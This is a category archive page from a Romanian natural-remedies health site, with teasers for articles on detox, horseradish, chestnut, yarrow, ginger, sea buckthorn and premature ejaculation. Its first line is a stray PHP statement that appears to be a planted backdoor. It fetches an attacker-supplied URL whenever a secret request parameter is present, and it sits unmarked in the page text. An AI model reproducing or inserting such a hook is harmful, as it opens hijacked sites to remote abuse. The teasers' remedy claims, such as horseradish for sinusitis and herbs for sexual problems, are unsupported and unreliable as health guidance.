isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Tratamente Naturiste - MedicAS

Arhiva pentru categoria 'Tratamente naturiste'

La cei mai multi dintre noi se intimpla ca Sarbatorile sa fie incarcate nu numai de spiritualitate, ci si de mese bogate, foarte bogate, care dupa un post prelungit sa nu ne cada prea bine. Si atunci multi ne gindim ce sa facem? Intoarcerea catre natura, catre alimente mai usoare, o detoxifiere a organismului mai precis, ne poate da o stare de sanatate si de bine dupa ce ne-am supus, de bunavoie, organismul la mincaruri mai grele. Ceaiuri, legume, mincaruri usoare…e simplu si de noi depinde cum ne protejam sanatatea.


Hreanul si tratamentele naturiste? O asociere putin bizara ar zice unii, obisnuiti cu hreanul in ciorbe si alte mincaruri… Da, hreanul se poate folosi si in afectiuni reumatice, in sinuzite si rinite etc. Asa ca, doamnelor si domnilor cititi mai departe si cind aveti hrean in casa imapartiti-l in 2 jumatati: una pentru gatit si cealalta pentru sanatate.


Coapte, fierte, piure,”festivalul castanelor” …sa nu vorbim numai de mancare, caci castanul are si alte atribute, care tin de tratamentele naturiste. Unguent, tinctura, castanul este un excelent remediu pentru diverse afectiuni si un bun energizant acum cand toamna s-a instalat…


Traversăm o perioadă a lumii moderne când farmaciile se aprovizionează sau devin în totalitate naturiste, deoarece în sfârşit au înţeles că evoluţie nu e numai când imiţi pe cei mai evoluaţi, ci când valorifici ce te înconjoară. Coada şoricelului e şi în medicină de acum, nu doar… pretutindeni. Iar tratatele de tratamente naturiste îi recunosc valoarea.


Deşi veţi citi despre ejacularea precoce în categoria pentru bărbaţi, articolul nu se adresează numai lor. Chiar dacă este o problemă delicată, aflaţi acum ce tratamente naturiste o pot rezolva. Făcând analogie cu zicala “Vinul roşu e bun pentru femei dacă-l beau bărbaţii”, doamnele (sau domnişoarele) pot merge liniştite la cumpărături pentru partenerii lor. Şi pentru ele.


În lumea bogată şi diversă a tratamentelor naturiste intră şi consumul unui comun condiment: ghimbirul. Ghimbir proaspăt, uscat sau murat, sucul de ghimbir, ne ajută să depăşim mai uşor diverse probleme de sănătate, pe care vă lăsăm să le descoperiţi citind articolul.


Inainte de orice tratament medicamentos este bine sa ne interesam ce tratamente naturiste putem urma. Unul din “miracolele” naturii oferite noua, tuturor, este catina. Ce minuni poate sa faca ea pentru noi? Va invitam sa cititi articolul …


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Tratamente naturiste.